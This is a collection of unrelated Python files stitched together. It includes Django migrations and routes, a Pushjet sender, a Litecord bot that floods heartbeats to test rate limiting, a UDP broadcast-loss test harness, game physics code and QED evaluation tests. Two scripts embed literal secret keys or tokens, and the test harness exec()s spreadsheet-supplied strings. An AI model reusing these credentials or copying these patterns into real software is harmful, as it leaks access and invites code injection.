# break
# json_data = json.loads(text)
# print(type(json_data),len(json_data))
# print(json_data.keys())
# for k,v in json_data.items():
# print(k,len(v)) |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2018-05-02 14:57
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('d4s2_api', '0024_auto_20180423_2026'),
]
operations = [
migrations.CreateModel(
name='DDSDeliveryError',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('message', models.TextField()),
('created', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='S3DeliveryError',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('message', models.TextField()),
('created', models.DateTimeField(auto_now_add=True)),
],
),
migrations.RenameField(
model_name='ddsdelivery',
old_name='completion_email_text',
new_name='sender_completion_email_text',
),
migrations.RemoveField(
model_name='historicalddsdelivery',
name='completion_email_text',
),
migrations.RemoveField(
model_name='historicals3delivery',
name='completion_email_text',
),
migrations.RemoveField(
model_name='s3delivery',
name='completion_email_text',
),
migrations.AddField(
model_name='historicalddsdelivery',
name='sender_completion_email_text',
field=models.TextField(blank=True),
),
migrations.AddField(
model_name='historicals3delivery',
name='sender_completion_email_text',
field=models.TextField(blank=True),
),
migrations.AddField(
model_name='s3delivery',
name='sender_completion_email_text',
field=models.TextField(blank=True),
),
migrations.AlterField(
model_name='ddsdelivery',
name='state',
field=models.IntegerField(choices=[(0, 'New'), (1, 'Notified'), (2, 'Accepted'), (3, 'Declined'), (5, 'Transferring')], default=0),
),
migrations.AlterField(
model_name='historicalddsdelivery',
name='state',
field=models.IntegerField(choices=[(0, 'New'), (1, 'Notified'), (2, 'Accepted'), (3, 'Declined'), (5, 'Transferring')], default=0),
),
migrations.AlterField(
model_name='historicals3delivery',
name='state',
field=models.IntegerField(choices=[(0, 'New'), (1, 'Notified'), (2, 'Accepted'), (3, 'Declined'), (5, 'Transferring')], default=0),
),
migrations.AlterField(
model_name='s3delivery',
name='state',
field=models.IntegerField(choices=[(0, 'New'), (1, 'Notified'), (2, 'Accepted'), (3, 'Declined'), (5, 'Transferring')], default=0),
),
migrations.AddField(
model_name='s3deliveryerror',
name='delivery',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='errors', to='d4s2_api.S3Delivery'),
),
migrations.AddField(
model_name='ddsdeliveryerror',
name='delivery',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='errors', to='d4s2_api.DDSDelivery'),
),
]
|
import sys
import pushjet
secret_key = '6e7ae26ce1758cd28edb5251b7cd4142'
service = pushjet.Service(secret_key)
line = sys.argv[1]
service.send(line)
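# Usage sketch (script filename assumed): python pushjet_send.py "backup finished"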
|
import discord
import asyncio
import logging
import json
logging.basicConfig(level=logging.DEBUG)
client = discord.Client()
@client.event
async def on_ready():
print('Connected!')
print('Username: ' + client.user.name)
print('ID: ' + client.user.id)
for i in range(130):
await client.ws.send(json.dumps({
'op': 1,
'd': 0,
}))
print("Finished ratelimiting")
@client.event
async def on_message(message):
if message.content.startswith('!editme'):
msg = await client.send_message(message.channel, '10')
await asyncio.sleep(3)
await client.edit_message(msg, '40')
@client.event
async def on_message_edit(before, after):
fmt = '**{0.author}** edited their message:\n{1.content}'
await client.send_message(after.channel, fmt.format(after, before))
client.run('litecord_RLoWjnc45pDX2shufGjijfyPbh2kV0sYGz2EwARhIAs=')
|
from django.urls import path
from . import views
app_name='reviews'
urlpatterns = [
path('<int:movie_pk>/', views.ReviewListCreate.as_view()),
path('<int:movie_pk>/detail/<int:review_pk>/', views.ReviewDetail.as_view()),
path('<int:review_pk>/like/', views.Like.as_view()),
path('<int:review_pk>/dislike/', views.Dislike.as_view()),
path('<int:review_pk>/report/', views.Reporting.as_view()),
path('<int:review_pk>/comments/', views.CommentCreate.as_view()),
path('<int:review_pk>/comments/<int:comment_pk>/', views.CommentDetail.as_view()),
] |
import time
import random
import threading
import socket
import re
from TCAction import PerformanceTCBase
from NativeLog import NativeLog
from Utility import Encoding
class SendThread(threading.Thread):
def __init__(self, sock, send_len, target_addr, delay):
threading.Thread.__init__(self)
self.sock = sock
self.send_len = send_len
self.target_addr = target_addr
self.delay = delay
self.exit_event = threading.Event()
self.send_count = 0
pass
def exit(self):
self.exit_event.set()
def run(self):
data = "A" * self.send_len
if self.sock is None:
return
while True:
if self.exit_event.isSet() is True:
break
try:
self.sock.sendto(data, self.target_addr)
except StandardError:
break
self.send_count += 1
time.sleep(self.delay * 0.001)
pass
def get_send_count(self):
return self.send_count
class RecvThread(threading.Thread):
def __init__(self, sock):
threading.Thread.__init__(self)
self.sock = sock
self.exit_event = threading.Event()
self.calc_event = threading.Event()
self.bytes_recv = 0
self.Max = 0.0
def start_calc(self):
self.calc_event.set()
def stop_calc(self):
self.calc_event.clear()
self.exit_event.set()
def run(self):
if self.sock is None:
return
while True:
if self.exit_event.isSet() is True:
break
try:
data, addr = self.sock.recvfrom(2048)
except StandardError:
break
if self.calc_event.isSet() is True:
self.bytes_recv += len(data)
if len(data) == 0:
                start = time.time()
                end = start
while True:
try:
data, addr = self.sock.recvfrom(2048)
except StandardError:
break
if len(data) > 0:
if self.calc_event.isSet() is True:
self.bytes_recv += len(data)
end = time.time()
break
if end - start > self.Max:
self.Max = end - start
def get_bytes_recv(self):
return self.bytes_recv
pass
def get_Max_time(self):
return self.Max
pass
class device_check(threading.Thread):
def __init__(self, port):
threading.Thread.__init__(self)
self.Max = 0.0
self.port = port
self.recv_data_cache = ""
self.cache_lock = threading.Lock()
self.exit_event = threading.Event()
def data_recv_callback(self, data):
with self.cache_lock:
self.recv_data_cache += data
pass
def exit(self):
self.exit_event.set()
pass
def run(self):
while self.exit_event.isSet() is False:
while True:
if self.recv_data_cache:
match = re.search("\+RECVFROM:\d+,\d+,\d+\.\d+\.\d+\.\d+,\d+", self.recv_data_cache)
if match is not None:
self.recv_data_cache = self.recv_data_cache[len(match.group()):]
else:
start = time.time()
end = 0.0
while True:
res = re.search("\+RECVFROM:\d+,\d+,\d+\.\d+\.\d+\.\d+,\d+", self.recv_data_cache)
if res is not None:
self.recv_data_cache = self.recv_data_cache[len(res.group()):]
end = time.time()
break
if end - start > self.Max:
self.Max = end - start
pass
def get_max_time(self):
return self.Max
class TestCase(PerformanceTCBase.PerformanceTCBase):
def __init__(self, test_case, test_env, timeout, log_path):
PerformanceTCBase.PerformanceTCBase.__init__(self, test_case, test_env, timeout, log_path)
self.send_len = 0
self.pc_send = 0
self.target_send = 0
self.test_time = 0
self.delay = 0
# load param from excel
cmd_set = test_case["cmd set"]
for i in range(1, len(cmd_set)):
if cmd_set[i][0] != "dummy":
cmd_string = "self." + cmd_set[i][0]
exec cmd_string
self.recv_cb_lock = threading.Lock()
self.recv_cb = dict.fromkeys(["SSC1"])
pass
def register_recv_callback(self, port_name, callback):
with self.recv_cb_lock:
if self.recv_cb[port_name] is None:
self.recv_cb[port_name] = [callback]
else:
self.recv_cb[port_name].append(callback)
pass
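    # process() below drives the test end to end: reboot the target over the "SSC1"
    # serial port, join the AP, bind UDP sockets on both PC and target, exchange
    # broadcast packets for test_time minutes, then log the measured loss rate.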
def process(self):
try:
# configurable params
send_len = self.send_len
pc_send = self.pc_send
target_send = self.target_send
test_time = self.test_time
delay = self.delay
ap_ssid = self.get_parameter("ap_ssid")
ap_password = self.get_parameter("ap_password")
pc_ip = self.get_parameter("pc_ip")
target_ip = self.get_parameter("target_ip")
except StandardError, e:
NativeLog.add_trace_critical("Error configuration for UDP script, error is %s" % e)
raise StandardError("Error configuration")
udp_port = random.randint(40000, 50000)
# reboot before executing
self.flush_data("SSC1")
self.serial_write_line("SSC1", "reboot")
if self.check_response("SSC1", "ready!!!", 5) is False:
NativeLog.add_trace_critical("Fail to reboot")
return
# set target as STA mode
self.flush_data("SSC1")
self.serial_write_line("SSC1", "op -S -o 1")
if self.check_response("SSC1", "+MODE:OK", 5) is False:
NativeLog.add_trace_critical("Fail to set mode")
return
# connect to AP
self.flush_data("SSC1")
self.serial_write_line("SSC1", "sta -C -s %s -p %s" % (ap_ssid, ap_password))
if self.check_response("SSC1", "+JAP:CONNECTED", 30) is False:
NativeLog.add_trace_critical("Fail to JAP")
return
# disable recv print on target
self.flush_data("SSC1")
self.serial_write_line("SSC1", "soc -R -o 0")
if self.check_response("SSC1", "+RECVPRINT", 5) is False:
NativeLog.add_trace_critical("Fail to disable recv print")
return
# get broadcast ip
res = re.search("(\d+\.\d+\.\d+\.)\d+", pc_ip)
if res is not None:
udp = res.group(1)
broadcast_ip = udp + "255"
else:
NativeLog.add_trace_critical("No ip addr found")
return
# close all connection on target
self.flush_data("SSC1")
self.serial_write_line("SSC1", "soc -T")
if self.check_response("SSC1", "+CLOSEALL", 5) is False:
NativeLog.add_trace_critical("Fail to close sock")
return
# create socket on pc
pc_sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
pc_sock.bind((pc_ip, udp_port))
pc_sock.settimeout(1)
# create socket on target
self.flush_data("SSC1")
self.serial_write_line("SSC1", "soc -B -t UDP -i %s -p %s" % (target_ip, udp_port))
if self.check_response("SSC1", "+BIND:0,OK,", 5) is False:
NativeLog.add_trace_critical("Fail to bind")
return
thread_dict = dict.fromkeys(["SSC1"])
thread_dict["SSC1"] = dict(zip(["check"], [None]))
thread_dict["SSC1"]["check"] = device_check(self.test_env.get_port_by_name("SSC1"))
self.register_recv_callback("SSC1", thread_dict["SSC1"]["check"].data_recv_callback)
send_thread = SendThread(pc_sock if pc_send is True else None, send_len, (broadcast_ip, udp_port), delay)
send_thread.start()
recv_thread = RecvThread(pc_sock if target_send is True else None)
recv_thread.start()
# start calculate
recv_thread.start_calc()
thread_dict["SSC1"]["check"].start()
send_count = 0
if target_send is True:
# do send from target
start = time.time()
while time.time() - start < test_time * 60:
self.flush_data("SSC1")
self.serial_write_line("SSC1", "soc -S -s 0 -l %s -n 1000 -i %s -p %s -j %s" % (
send_len, broadcast_ip, udp_port, delay))
if self.check_response("SSC1", "+SEND:0,OK", 300) is False:
NativeLog.add_trace_critical("Fail to send")
return
send_count += 1000
else:
time.sleep(test_time * 60)
send_thread.exit()
send_thread.join()
# stop throughput calculate
while True:
if recv_thread.isAlive() is False:
recv_thread.stop_calc()
recv_thread.join()
break
Max = 0.0
recv_count = 0
if pc_send is True:
send_count = send_thread.get_send_count()
start = time.time()
rx_data_len = 0
suc_time = 0
while time.time() - start < 30:
self.flush_data("SSC1")
self.serial_write_line("SSC1", "soc -Q -s 0 -o 1")
time.sleep(0.05)
data = self.serial_read_data("SSC1")
if data is not None:
res = re.search("\+RECVLEN:(\d+)", data)
if res is not None:
if rx_data_len < int(res.group(1)):
rx_data_len = int(res.group(1))
time.sleep(0.5)
else:
suc_time += 1
if suc_time > 5:
break
if (rx_data_len * 8 % send_len) > 0:
recv_count = rx_data_len / send_len + 1
else:
recv_count = rx_data_len / send_len
if recv_thread.get_bytes_recv() > 0:
if (recv_thread.get_bytes_recv() % send_len) > 0:
recv_count = recv_thread.get_bytes_recv() / send_len + 1
else:
recv_count = recv_thread.get_bytes_recv() / send_len
Max = recv_thread.get_Max_time()
thread_dict["SSC1"]["check"].exit()
pc_sock.close()
self.set_result("Succeed")
NativeLog.add_trace_critical("send_count is %s, recv_count is %s" % (send_count, recv_count))
NativeLog.add_trace_critical(
"UDP Broadcast lose rate is %.2f%%" % (float(send_count - recv_count) / send_count * 100))
NativeLog.add_trace_critical("UDP Broadcast lose test MAX time is %.4f" % Max)
@Encoding.encode_utf8(3)
def result_check(self, port_name, data):
PerformanceTCBase.PerformanceTCBase.result_check(self, port_name, data)
if port_name in self.recv_cb:
with self.recv_cb_lock:
callback_list = self.recv_cb[port_name]
if callback_list is not None:
for callback in callback_list:
callback(data)
pass
def main():
pass
if __name__ == '__main__':
main()
|
from haxballgym.game.common_values import COLLISION_FLAG_ALL
from haxballgym.game.objects.base import PhysicsObject
import numpy as np
import copy
class Disc(PhysicsObject):
"""
A class to represent the state of a disc from the game.
"""
def __init__(self, data_object=None, data_stadium=None):
if data_object is None:
data_object = {}
self.collision_group: int = self.transform_collision_dict(
data_object.get("cGroup")
)
self.collision_mask: int = self.transform_collision_dict(
data_object.get("cMask")
)
self.position: np.ndarray = np.array(data_object.get("pos"), dtype=float)
self.velocity: np.ndarray = np.array(data_object.get("speed"), dtype=float)
self.bouncing_coefficient: float = data_object.get("bCoef")
self.radius: float = data_object.get("radius")
self.inverse_mass: float = data_object.get("invMass")
self.damping: float = data_object.get("damping")
self.trait = data_object.get("trait")
self.apply_trait(self, data_stadium)
self.apply_default_values()
def apply_default_values(self):
if self.collision_group is None:
self.collision_group = COLLISION_FLAG_ALL
if self.collision_mask is None:
self.collision_mask = COLLISION_FLAG_ALL
        if np.isnan(self.velocity).any():
self.velocity = np.zeros(2)
if self.bouncing_coefficient is None:
self.bouncing_coefficient = 0.5
if self.radius is None:
self.radius = 10
if self.inverse_mass is None:
self.inverse_mass = 0
if self.damping is None:
self.damping = 0.99
def copy(self, other: "Disc") -> "Disc":
self.collision_group = copy.copy(other.collision_group)
self.collision_mask = copy.copy(other.collision_mask)
self.position = copy.copy(other.position)
self.velocity = copy.copy(other.velocity)
self.bouncing_coefficient = copy.copy(other.bouncing_coefficient)
self.radius = copy.copy(other.radius)
self.inverse_mass = copy.copy(other.inverse_mass)
self.damping = copy.copy(other.damping)
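# Rough usage sketch (keys follow the stadium JSON fields read above; how
# apply_trait treats a disc without a "trait" entry is an assumption):
#   disc = Disc({"pos": [0.0, 0.0], "speed": [1.0, 0.0], "radius": 15.0}, data_stadium)
#   disc.position = disc.position + disc.velocity   # one naive integration step
#   disc.velocity = disc.velocity * disc.damping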
|
from six import PY2
import collections
from syn.five import xrange
from syn.types.a import Type, Mapping, Dict, \
hashable, serialize, deserialize, estr, rstr, visit, find_ne, \
DiffersAtKey, KeyDifferences, deep_feq, safe_sorted, primitive_form, \
collect
from syn.types.a import enumerate as enumerate_
from syn.base_utils import is_hashable, assert_equivalent, on_error, elog, \
ngzwarn, is_unique, subclasses, hangwatch
from syn.globals import TEST_SAMPLES as SAMPLES
SAMPLES //= 10
SAMPLES = max(SAMPLES, 1)
ngzwarn(SAMPLES, 'SAMPLES')
#-------------------------------------------------------------------------------
def ss(obj):
if isinstance(obj, collections.Mapping):
return safe_sorted(obj.values())
return safe_sorted(obj)
ss(1)
ss({})
def examine_mapping(cls, val):
assert type(val) is cls.type
assert is_hashable(hashable(val))
sval = deserialize(serialize(val))
assert deep_feq(sval, val) or deep_feq(collect(sval, ss), collect(val, ss))
assert deserialize(serialize(cls.type)) is cls.type
assert isinstance(rstr(val), str)
assert list(visit(val)) == safe_sorted(list(val.items()))
assert find_ne(val, val) is None
# NOTE: estr has been relegated to experimental status for now
# eitem = eval(estr(val))
# assert deep_feq(sval, val)
# assert type(eitem) is cls.type
#-------------------------------------------------------------------------------
# Mapping
def test_mapping():
d = dict(a = 1, b = 2.3)
t = Type.dispatch(d)
assert isinstance(t, Mapping)
assert type(t) is Dict
if PY2:
assert set(hashable(d)) == set(t.hashable()) == \
{'__builtin__.dict', ('a', 1), ('b', 2.3)}
else:
assert set(hashable(d)) == set(t.hashable()) == \
{'builtins.dict', ('a', 1), ('b', 2.3)}
d1 = dict(a=1, b=2)
d2 = dict(a=1, b=2, c=3)
d3 = dict(a=1, b=3)
assert find_ne(d1, d2) == KeyDifferences(d1, d2)
assert find_ne(d2, d1) == KeyDifferences(d2, d1)
assert find_ne(d1, d3) == DiffersAtKey(d1, d3, 'b')
e1 = eval(estr(d1))
assert_equivalent(e1, d1)
assert not is_hashable(d)
assert is_hashable(hashable(d))
examine_mapping(Dict, d)
for cls in subclasses(Mapping):
for k in xrange(SAMPLES):
val = cls.generate()
with on_error(elog, examine_mapping, (cls, val)):
hangwatch(1, examine_mapping, cls, val)
buf = []
last = None
for item in enumerate_(cls.type, max_enum=SAMPLES * 10, step=100):
assert type(item) is cls.type
assert item != last
buf.append(item)
last = item
assert is_unique(buf)
d = dict(a=1, b=[1, 2, (3, 4)])
assert primitive_form(d) == dict(a=1, b=[1, 2, [3, 4]])
assert collect(d) == primitive_form(d)
#-------------------------------------------------------------------------------
# Bad test cases
def test_bad_cases():
d = {'\x8a\x86k\xd1k\xafd\x12': set([-1.3846455538007134e+308,
-2812529263850842664,
(-3.90682317364909e+307+1.010644744358304e+308j),
1.0698329510780509e+308]),
(8.814339430527538e+307+7.59265276795928e+307j): None,
-78098711297023825948717305522402599973510534836931705515263: ()}
examine_mapping(Dict, d)
# from syn.types.a import OrderedDict as OrderedDict_
# from collections import OrderedDict
# val = OrderedDict([((-1.4295764407292497e+308+1.424986100748943e+308j),
# -810127967009107279),
# (-1.827012095486929e+307, None),
# (1.6642652599670256e+308,
# {8.938423188190213e+307: False,
# (1.0761629010589936e+308-1.6057678269394774e+308j): False}),
# (1321286071298621711, (-1.1971920347818657e+308-7.047893113499448e+307j))])
# examine_mapping(OrderedDict_, val)
#-------------------------------------------------------------------------------
if __name__ == '__main__': # pragma: no cover
from syn.base_utils import run_all_tests
run_all_tests(globals(), verbose=True, print_errors=False)
|
# Lint as: python3
"""Tests for google3.third_party.py.language.google.qed.qed_eval."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import qed_eval
from absl.testing import absltest
example_1 = """
{
"example_id": -6560319052930436991,
"title_text": "Flight (Grey's Anatomy)",
"url": "https://en.wikipedia.org//w/index.php?title=Flight_(Grey%27s_Anatomy)&oldid=804214813",
"question_text": "who died in the plane crash greys anatomy",
"paragraph_text": "`` Flight '' is the twenty - fourth and final episode of the eighth season of the American television medical drama Grey 's Anatomy , and the show 's 172nd episode overall . It was written by series creator Shonda Rhimes , and directed by Rob Corn . The episode was originally broadcast on the American Broadcasting Company ( ABC ) in the United States on May 17 , 2012 . In the episode , six doctors from Seattle Grace Mercy West Hospital who are victims of an aviation accident fight to stay alive , but Dr. Lexie Grey ( Chyler Leigh ) ultimately dies . Other storylines occur in Seattle where Dr. Richard Webber ( James Pickens , Jr . ) plans his annual dinner for the departing residents , Dr. Owen Hunt ( Kevin McKidd ) fires Dr. Teddy Altman ( Kim Raver ) , and Dr. Miranda Bailey ( Chandra Wilson ) gets engaged .",
"sentence_starts": [
0,
174,
250,
372,
556
],
"original_nq_answers": [
[
{
"start": 506,
"end": 520,
"string": "Dr. Lexie Grey"
}
],
[
{
"start": 506,
"end": 537,
"string": "Dr. Lexie Grey ( Chyler Leigh )"
}
],
[
{
"start": 506,
"end": 520,
"string": "Dr. Lexie Grey"
},
{
"start": 523,
"end": 535,
"string": "Chyler Leigh"
}
]
],
"annotation": {
"referential_equalities": [
{
"question_reference": {
"start": 12,
"end": 27,
"string": "the plane crash"
},
"sentence_reference": {
"start": 459,
"end": 479,
"bridge": false,
"string": "an aviation accident"
}
},
{
"question_reference": {
"start": 28,
"end": 41,
"string": "greys anatomy"
},
"sentence_reference": {
"start": -1,
"end": -1,
"bridge": "of",
"string": ""
}
}
],
"answer": [
{
"sentence_reference": {
"start": 506,
"end": 520,
"bridge": false,
"string": "Dr. Lexie Grey"
},
"paragraph_reference": {
"start": 506,
"end": 520,
"string": "Dr. Lexie Grey"
}
}
],
"explanation_type": "single_sentence",
"selected_sentence": {
"start": 372,
"end": 556,
"string": "In the episode , six doctors from Seattle Grace Mercy West Hospital who are victims of an aviation accident fight to stay alive , but Dr. Lexie Grey ( Chyler Leigh ) ultimately dies . "
}
}
}"""
example_2 = """
{
"example_id": -4340755100872459608,
"title_text": "Health (gaming)",
"url": "https://en.wikipedia.org//w/index.php?title=Health_(gaming)&oldid=819315199",
"question_text": "what does hp mean in war and order",
"paragraph_text": "Health or vitality is an attribute assigned to entities , such as the player character , enemies and objects within a role - playing or video game , that indicates its state in combat . Health is usually measured in hit points or health points , shortened to HP . When the HP of a player character reaches zero , the player may lose a life or their character might become incapacitated or die . When the HP of an enemy reaches zero , it may be defeated or die and the player is usually rewarded in some way .",
"sentence_starts": [
0,
186,
264,
395
],
"original_nq_answers": [
[
{
"start": 216,
"end": 243,
"string": "hit points or health points"
}
]
],
"annotation": {
"referential_equalities": [
{
"question_reference": {
"start": 10,
"end": 12,
"string": "hp"
},
"sentence_reference": {
"start": 259,
"end": 261,
"bridge": false,
"string": "HP"
}
}
],
"answer": [
{
"sentence_reference": {
"start": 216,
"end": 243,
"bridge": false,
"string": "hit points or health points"
},
"paragraph_reference": {
"start": 216,
"end": 243,
"string": "hit points or health points"
}
}
],
"explanation_type": "single_sentence",
"selected_sentence": {
"start": 186,
"end": 264,
"string": "Health is usually measured in hit points or health points , shortened to HP . "
}
}
}"""
class QedEvalTest(absltest.TestCase):
def setUp(self):
super(QedEvalTest, self).setUp()
self._annotation_jsonlines = [json.loads(example_1), json.loads(example_2)]
annot_elems = [
qed_eval.load_single_line(l) for l in self._annotation_jsonlines
]
self.annotation_dict = {elem.example_id: elem for elem in annot_elems}
def get_span(self, text, span):
return {"start": span[0], "end": span[1], "string": text[span[0]:span[1]]}
def set_answer(self, example, answers):
output_answers = example["annotation"]["answer"]
output_answers.clear()
for answer in answers:
output_answers.append({
"paragraph_reference":
self.get_span(example["paragraph_text"], answer)
})
def set_refs(self, example, refs):
refs_output = example["annotation"]["referential_equalities"]
refs_output.clear()
for ref in refs:
question_span, sentence_span = ref
refs_output.append({
"question_reference":
self.get_span(example["question_text"], question_span),
"sentence_reference":
self.get_span(example["paragraph_text"], sentence_span)
})
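  # The helpers above turn the gold JSON into a synthetic "prediction": set_answer
  # swaps in paragraph-level answer spans and set_refs swaps in (question, sentence)
  # reference pairs, so each test can control exactly which parts match the annotation.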
def test_strict_accuracy_on_correct(self):
prediction_jsonlines = [json.loads(example_1), json.loads(example_2)]
self.set_answer(prediction_jsonlines[0], [(506, 520)]) # correct answer
self.set_refs(
prediction_jsonlines[0],
[
((12, 27), (459, 479)), # two correct refs
((28, 41), (-1, -1))
])
self.set_answer(prediction_jsonlines[1], [(216, 243)]) # correct answer
self.set_refs(prediction_jsonlines[1],
[((10, 12), (259, 261))]) # one correct ref
pred_elems = [qed_eval.load_single_line(l) for l in prediction_jsonlines]
prediction_dict = {elem.example_id: elem for elem in pred_elems}
score_dict = qed_eval.compute_scores(
self.annotation_dict, prediction_dict, strict=True)
self.assertEqual(score_dict["exact_match_accuracy"], 1.0)
self.assertEqual(score_dict["pair"][0], 1.0)
self.assertEqual(score_dict["pair"][1], 1.0)
self.assertEqual(score_dict["question_mention"][0], 1.0)
self.assertEqual(score_dict["question_mention"][1], 1.0)
self.assertEqual(score_dict["context_mention"][0], 1.0)
self.assertEqual(score_dict["context_mention"][1], 1.0)
self.assertEqual(score_dict["all_mention"][0], 1.0)
self.assertEqual(score_dict["all_mention"][1], 1.0)
self.assertEqual(score_dict["answer_accuracy"], 1.0)
def test_strict_accuracy(self):
prediction_jsonlines = [json.loads(example_1), json.loads(example_2)]
self.set_answer(prediction_jsonlines[0], [(506, 520)]) # correct answer
self.set_refs(prediction_jsonlines[0],
[((28, 41), (-1, -1))]) # one correct ref, one missing
self.set_answer(prediction_jsonlines[1], [(217, 243)]) # wrong answer
self.set_refs(prediction_jsonlines[1],
[((10, 12), (259, 261))]) # one correct ref
pred_elems = [qed_eval.load_single_line(l) for l in prediction_jsonlines]
prediction_dict = {elem.example_id: elem for elem in pred_elems}
score_dict = qed_eval.compute_scores(
self.annotation_dict, prediction_dict, strict=True)
self.assertEqual(score_dict["exact_match_accuracy"], 0.5)
self.assertEqual(score_dict["pair"][0], 1.0)
self.assertEqual(score_dict["pair"][1], 2.0 / 3.0)
self.assertEqual(score_dict["question_mention"][0], 1.0)
self.assertEqual(score_dict["question_mention"][1], 2.0 / 3.0)
self.assertEqual(score_dict["context_mention"][0], 1.0)
self.assertEqual(score_dict["context_mention"][1], 1.0 / 2.0)
self.assertEqual(score_dict["all_mention"][0], 1.0)
self.assertEqual(score_dict["all_mention"][1], 3.0 / 5.0)
self.assertEqual(score_dict["answer_accuracy"], 1.0 / 2.0)
def test_non_strict_accuracy(self):
prediction_jsonlines = [json.loads(example_1), json.loads(example_2)]
self.set_answer(prediction_jsonlines[0], [(506, 520)]) # correct answer
self.set_refs(
prediction_jsonlines[0],
[
((15, 27), (462, 479)), # one correct ref (non strict)
((28, 41), (-1, -1))
]) # one correct ref
self.set_answer(prediction_jsonlines[1],
[(217, 243)]) # correct answer (non strict)
self.set_refs(prediction_jsonlines[1],
[((10, 12), (259, 261))]) # one correct ref
pred_elems = [qed_eval.load_single_line(l) for l in prediction_jsonlines]
prediction_dict = {elem.example_id: elem for elem in pred_elems}
score_dict = qed_eval.compute_scores(
self.annotation_dict, prediction_dict, strict=False)
print(score_dict)
self.assertEqual(score_dict["exact_match_accuracy"], 1.0)
self.assertEqual(score_dict["pair"][0], 1.0)
self.assertEqual(score_dict["pair"][1], 1.0)
self.assertEqual(score_dict["question_mention"][0], 1.0)
self.assertEqual(score_dict["question_mention"][1], 1.0)
self.assertEqual(score_dict["context_mention"][0], 1.0)
self.assertEqual(score_dict["context_mention"][1], 1.0)
self.assertEqual(score_dict["all_mention"][0], 1.0)
self.assertEqual(score_dict["all_mention"][1], 1.0)
self.assertEqual(score_dict["answer_accuracy"], 1.0)
score_dict = qed_eval.compute_scores(
self.annotation_dict, prediction_dict, strict=True)
print(score_dict)
self.assertEqual(score_dict["exact_match_accuracy"], 0.5)
self.assertEqual(score_dict["pair"][0], 2.0 / 3.0)
self.assertEqual(score_dict["pair"][1], 2.0 / 3.0)
self.assertEqual(score_dict["question_mention"][0], 2.0 / 3.0)
self.assertEqual(score_dict["question_mention"][1], 2.0 / 3.0)
self.assertEqual(score_dict["context_mention"][0], 0.5)
self.assertEqual(score_dict["context_mention"][1], 0.5)
self.assertEqual(score_dict["all_mention"][0], 3.0 / 5.0)
self.assertEqual(score_dict["all_mention"][1], 3.0 / 5.0)
self.assertEqual(score_dict["answer_accuracy"], 1.0 / 2.0)
def test_non_strict_accuracy_not_enough_overlap(self):
prediction_jsonlines = [json.loads(example_1), json.loads(example_2)]
self.set_answer(prediction_jsonlines[0], [(500, 510)]) # correct answer
self.set_refs(
prediction_jsonlines[0],
[
((16, 27), (462, 481)), # one wrong ref (overlap 0.88)
((30, 45), (0, 0))
]) # one wrong ref
self.set_answer(prediction_jsonlines[1], [(230, 250)]) # correct answer
self.set_refs(prediction_jsonlines[1],
[((9, 12), (259, 262))]) # one wrong ref
pred_elems = [qed_eval.load_single_line(l) for l in prediction_jsonlines]
prediction_dict = {elem.example_id: elem for elem in pred_elems}
score_dict = qed_eval.compute_scores(
self.annotation_dict, prediction_dict, strict=False)
print(score_dict)
self.assertEqual(score_dict["exact_match_accuracy"], 0.0)
self.assertEqual(score_dict["pair"][0], 0.0)
self.assertEqual(score_dict["pair"][1], 0.0)
self.assertEqual(score_dict["question_mention"][0], 0.0)
self.assertEqual(score_dict["question_mention"][1], 0.0)
self.assertEqual(score_dict["context_mention"][0], 0.0)
self.assertEqual(score_dict["context_mention"][1], 0.0)
self.assertEqual(score_dict["all_mention"][0], 0.0)
self.assertEqual(score_dict["all_mention"][1], 0.0)
self.assertEqual(score_dict["answer_accuracy"], 0.0)
score_dict = qed_eval.compute_scores(
self.annotation_dict, prediction_dict, strict=True)
print(score_dict)
self.assertEqual(score_dict["exact_match_accuracy"], 0.0)
self.assertEqual(score_dict["pair"][0], 0.0)
self.assertEqual(score_dict["pair"][1], 0.0)
self.assertEqual(score_dict["question_mention"][0], 0.0)
self.assertEqual(score_dict["question_mention"][1], 0.0)
self.assertEqual(score_dict["context_mention"][0], 0.0)
self.assertEqual(score_dict["context_mention"][1], 0.0)
self.assertEqual(score_dict["all_mention"][0], 0.0)
self.assertEqual(score_dict["all_mention"][1], 0.0)
self.assertEqual(score_dict["answer_accuracy"], 0.0)
def test_accuracy_for_alternative_answers(self):
prediction_jsonlines = [json.loads(example_1), json.loads(example_2)]
self.set_answer(prediction_jsonlines[0],
[(506, 537)]) # correct answer (alternative answer)
self.set_answer(prediction_jsonlines[1], [(216, 243)]) # correct answer
pred_elems = [qed_eval.load_single_line(l) for l in prediction_jsonlines]
prediction_dict = {elem.example_id: elem for elem in pred_elems}
score_dict = qed_eval.compute_scores(
self.annotation_dict, prediction_dict, strict=True)
self.assertEqual(score_dict["answer_accuracy"], 1.0)
def test_accuracy_for_alternative_answers_with_multiple_spans(self):
prediction_jsonlines = [json.loads(example_1), json.loads(example_2)]
self.set_answer(prediction_jsonlines[0],
[(524, 536), (505, 519)]) # correct alternative, non strict
self.set_answer(prediction_jsonlines[1], [(216, 243)]) # correct answer
pred_elems = [qed_eval.load_single_line(l) for l in prediction_jsonlines]
prediction_dict = {elem.example_id: elem for elem in pred_elems}
score_dict = qed_eval.compute_scores(
self.annotation_dict, prediction_dict, strict=True)
self.assertEqual(score_dict["answer_accuracy"], 0.5)
score_dict = qed_eval.compute_scores(
self.annotation_dict, prediction_dict, strict=False)
self.assertEqual(score_dict["answer_accuracy"], 1.0)
if __name__ == "__main__":
absltest.main()
|
import bs4
import requests
from bs4 import BeautifulSoup
from datetime import datetime, timedelta
def go():
    # Subtract a day with timedelta so month/year boundaries roll over correctly
    # (day - 1 alone yields day 0 on the first of a month).
    yesterday_dt = datetime.now() - timedelta(days=1)
    yesterday = '{}/{}/{}'.format(yesterday_dt.month, yesterday_dt.day, yesterday_dt.year)
    last_year = '{}/{}/{}'.format(yesterday_dt.month, yesterday_dt.day, yesterday_dt.year - 1)
return yesterday, last_year
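# Example: run on 2024-02-15, go() returns ('2/14/2024', '2/14/2023').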
|
#!/usr/bin/env python
import sys, os
import itertools, shutil
